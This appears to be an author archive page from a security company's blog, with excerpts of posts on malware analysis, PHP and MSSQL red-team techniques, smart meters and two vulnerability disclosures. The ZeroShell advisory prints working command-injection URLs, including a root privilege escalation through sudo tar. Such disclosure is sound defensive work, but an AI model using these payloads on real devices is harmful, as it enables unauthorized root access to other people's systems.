About Administrador

So far Administrador has created 238 blog entries.

Ragnarok Stopper: development of a vaccine

4 May 2020 | BlackArrow blog

The field of reverse engineering, and specifically malware analysis within the Incident Response process, is of vital importance. Beyond the analysis of logs, events, network connections, alerts generated by IDS and firewalls, etc., experience tells us that a preliminary and quick analysis of a suspicious binary (whenever possible) can offer high-value intelligence, not just to get more context about an incident (TTP, C2, persistence, timeline, etc.) but to develop tools or techniques to mitigate a campaign still underway. The following case is an example of this. In a recent incident we obtained a binary packaged with Ragnarok, a malware widely used in recent months in various campaigns. The aim of this post is to describe a possible vaccine that ...

Hybrid Threats against Companies

14 Apr 2020 | Cyber intelligence blog

Hybrid threats are not new to the corporate sector

Expressions such as hybrid war and hybrid threat have given name to phenomena of increasing prominence so far this century. At the same time, the definition of the notions behind those terms has been progressively narrowed. There is also a growing effort to better understand and study this concern. The correlation between term and concept was originally developed in the military and geopolitical domains, as a result of new ways of understanding war, changes and developments in national strategies and confrontation between countries. The term hybrid refers to a state of non-direct, latent conflict which does not openly and officially escalate beyond certain limits, and where casualties and/or direct damages are not agreed upon ...

A deep dive into disable_functions bypass and PHP exploitation

26 Mar 2020 | BlackArrow blog

When performing a penetration test or a Red Team operation, multiple tools (webshells, SOCKS proxies to tunnel TCP traffic over HTTP and pivot, etc.) tend to be deployed on compromised web servers as custom scripts. In some cases these servers may be more or less hardened, making them somewhat more difficult to compromise. One of the most common configurations found in PHP environments is the use of disable_functions to restrict which functions can be called from PHP scripts, in order to block "dangerous" ones such as system(), passthru(), etc. In this article we will take an in-depth look at how this PHP directive works and how it can be circumvented. In summary, this article aims to shed light on the following ...

Lateral movement via MSSQL: a tale of CLR and socket reuse

24 Mar 2020 | BlackArrow blog

Recently, our Red Teamers had to deal with a restricted scenario, where all traffic from the DMZ to the main network was blocked, except for connections to specific services like databases and some web applications. In this article we will explain how we overcame the situation, covering the technical details. We also introduce mssqlproxy, a tool for turning a Microsoft SQL Server into a SOCKS proxy.

Introduction and context

At some point, sysadmin access to a Microsoft SQL Server within the main network is gained, but only traffic to port 1433 is allowed. After trying to launch a reverse shell via xp_cmdshell, the team realized that connections back to the DMZ were also blocked.

Restricted environment

In order to ...

Tabletop – Simulation Exercise

28 Nov 2019 | Cyber intelligence blog

For decades, airlines and air forces have used simulators as an essential tool to strengthen navigational safety and to improve the preparation and level of training of their crews. Using the simulator, crews become familiar with the rules and procedures of navigation and air traffic and improve their ability to respond to alerts and emergencies under conditions of "virtual stress". This is because in simulated environments situations can be repeated in order to improve responses to the exercises and scenarios that arise. In spite of its increasing technological complexity, the flight simulator is ultimately a cost-effective tool if one takes into account the savings made in terms of fuel, aircraft maintenance and navigation systems, amongst other benefits (reducing pollution, ...

France and economic intelligence

6 Nov 2019 | Cyber intelligence blog

Summary

France is a pertinent example of a country where the State supports large national companies through its intelligence services. It further distinguishes itself with the transfer of knowledge from the intelligence community to the private sphere through the creation of organizations and training programs that have been enhanced by the experience of former members of the intelligence services. This process has allowed for the creation of a unique and original way of thinking when it comes to economic intelligence. However, the French intelligence services have prioritized counterterrorism, which has come with a reduction in the resources allocated to intelligence work in the economic sphere, in addition to the need to take on the new responsibilities arising from the spike ...

Smart Meters – Threats and Attacks to PRIME Meters

4 Nov 2019 | Tarlogic's Blog - Cybersecurity

A golden rule in the world of cybersecurity is that the risk of a system is greater than the aggregate risk of its component elements. This is because, as the number of vulnerable elements grows, attacks against the system become more sophisticated (and more difficult to trace). The first step needed to identify the risk of an element is to study the threats to which it is subjected and, subsequently, to study what makes it vulnerable to them. Thus, in an infrastructure of smart meters, the most pertinent threats are the following:

- Threats to meters
- Threats to the network hub
- Threats to the remote management network
- Threats to the distributor's servers
- Threats to links

This article will list the threats to ...

ZeroShell Vulnerability – CVE-2019-12725

17 Jul 2019 | Tarlogic's Blog - Cybersecurity

Product: ZeroShell
Publication Date: 17/07/2019
Author: Juan Manuel Fernandez (@TheXC3LL) - Tarlogic

Zeroshell vulnerability - CVE-2019-12725: RCE as root

The latest version of the ZeroShell Linux router (3.9.0) is vulnerable to RCE because some parameters inside a script are used without proper sanitization. This issue can be abused via new-line characters.

Example of vulnerable parameter:

/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type='%0Auname -a%0A'

Additionally, the Apache user can execute the "tar" command as root (/etc/sudoers):

(...)
apache ALL= NOPASSWD: /bin/tar
(...)

Zeroshell exploit

This ZeroShell vulnerability can be abused in order to elevate privileges via the RCE:

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id%0A'

uid=0(root) gid=0(root) groups=0(root)

A security update will be released in the coming days.

Ubiquoss Switch VP5208A Vulnerability – CVE-2018-10024

1 Sep 2018 | Tarlogic's Blog - Cybersecurity

Vendor: Ubiquoss
Product: Ubiquoss Switch VP5208A
Discovered by: Juan Manuel Fernandez - Tarlogic (@TheXC3LL)

Ubiquoss Switch VP5208A Vulnerability - CVE-2018-10024

Credential disclosure
----------------------
Ubiquoss Switch VP5208A creates a bcm_password file at /cgi-bin/ containing the user credentials in clear text when a failed login attempt is made. The file can be reached via a browser. The credentials can be used to access the system via SSH (or telnet, if it is enabled).

Time Line
----------------------
18/09/17 - First attempt to contact vendor.
06/03/18 - Contacted US-CERT with the report.
15/03/18 - ACK from US-CERT. They gave us another e-mail address to try to contact.
15/03/18 - Attempt to contact vendor at the new e-mail address.
09/04/18 - Disclosure